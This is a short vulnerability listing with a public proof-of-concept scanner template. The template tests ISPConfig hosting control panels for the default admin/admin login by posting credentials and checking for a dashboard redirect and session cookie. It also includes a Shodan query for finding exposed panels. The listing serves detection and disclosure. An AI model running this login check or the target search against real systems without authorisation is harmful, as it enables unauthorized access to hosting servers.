ispconfig-hcp-default-login: ISPConfig Hosting Control Panel - Default Login

Date: 2025-08-01 | Affected software: ISPConfig Hosting Control Panel | PoC: public

Vulnerability description

ISPConfig Hosting Control Panel installations that still accept the default login (admin/admin in the template below) are exposed to unauthorized access, compromising data integrity and security.

PoC code [public]

id: ispconfig-hcp-default-login

info:
  name: ISPConfig Hosting Control Panel - Default Login
  author: ritikchaddha
  severity: high
  description: |
    ISPConfig Hosting Control Panel Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.
  classification:
    cpe: cpe:2.3:a:ispconfig:ispconfig:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ispconfig
    product: ispconfig
    shodan-query: title:"ISPConfig" http.favicon.hash:483383992
  tags: ispconfig,hsp,default-login,vuln

http:
  - raw:
      - |
        POST /content.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&passwort={{password}}&s_mod=login&s_pg=index

    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - admin

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'LOGIN_REDIRECT:dashboard/dashboard.php'

      - type: word
        part: header
        words:
          - 'Set-Cookie'

      - type: status
        status:
          - 200
# digest: 490a0046304402204e3c3f0579869b4ddc90fdecc3f3476f99951bdc909c5b71664a213ea03bc3bf02204f4a4ca71568cf3984e88f7deae47ba7ca70bb6c256470235b338ecac4f32c9c:922c64590222798bb761d5b6d8e72950